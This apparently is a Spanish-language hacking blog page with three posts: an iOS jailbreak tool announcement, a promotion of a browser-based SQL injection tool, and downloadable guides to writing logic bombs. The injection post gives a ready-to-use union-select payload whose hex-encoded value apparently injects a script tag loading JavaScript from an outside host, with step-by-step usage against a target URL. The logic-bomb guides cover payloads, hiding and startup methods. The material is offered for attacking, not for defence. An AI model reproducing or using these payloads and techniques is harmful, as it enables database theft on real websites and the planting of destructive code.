Realizar Jailbreak a Iphone, Ipad y Ipod Touch

Desde hace algunos días se encuentra disponible Spirit, una herramienta que permite realizar Jailbreak con un solo click al Iphone, Ipad y Ipod Touch. Cuenta con versiones para Windows y Mac OS y entre las novedades que nos ofrece este programa podemos encontrar que permite realizar Jailbreak a dispositivos con Firmware versión 3.1.3 (Iphone y Ipod Touch) y versión 3.2 (Ipad). Funciona con Itunes 9.1, ya que como algunos sabrán blackra1n anteriormente presentaba problemas con esa versión y solo se podía usar aplicando un parche. Y la característica más importante para mi es que permite hacer un Jailbreak permanente (untethered), es decir que si apagamos el dispositivo no tendremos que conectarlo al PC para volverlo a ‘hackear’.

Pueden encontrar la descarga en su sitio oficial: Spirit.

PD: Si tienen problemas usando este programa, ejecútenlo en modo compatibilidad con Windows 98.

Tutorial de como usar Spirit para realizar el Jailbreak

[youtube]http://www.youtube.com/watch?v=eFlgnfEasRQ[/youtube]

General Injection Explorer 3.0

Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.

[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.

[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–

En el siguiente gif pueden ver como funciona:

Conociendo y creando una bomba lógica

Los siguientes textos fueron escritos por mi amigo Ghost, en ellos se habla sobre las bombas lógicas, como funcionan y como crearlas en diferentes lenguajes:

TOMO I

1. Introducción
1.1 Que es una bomba lógica
1.2 Como trabajan
1.3 Payloads
2. Programando una bomba lógica
2.1 Bombas lógicas en Batch
2.2 Bombas lógicas en Object Pascal
3. Ingeniería del Software “Porque programar una bomba lógica”
3.1 Sobre los programas Shareware
4. Legalidad y ética
5. Conclusiones

Formato: PDF | Tamaño: 366 KB

Descargar

TOMO II

1. INTRODUCCIÓN
1.1 El lenguaje de programación C
1.2 El API de Windows
2. MÁS TECNICAS DE PROGRAMACIÓN
2.1 Programando una bomba lógica en C
2.2 Ocultación
2.3 Métodos de arranque
3. CONCLUSIONES

Formato: PDF | Tamaño: 400 KB Aprox

Descargar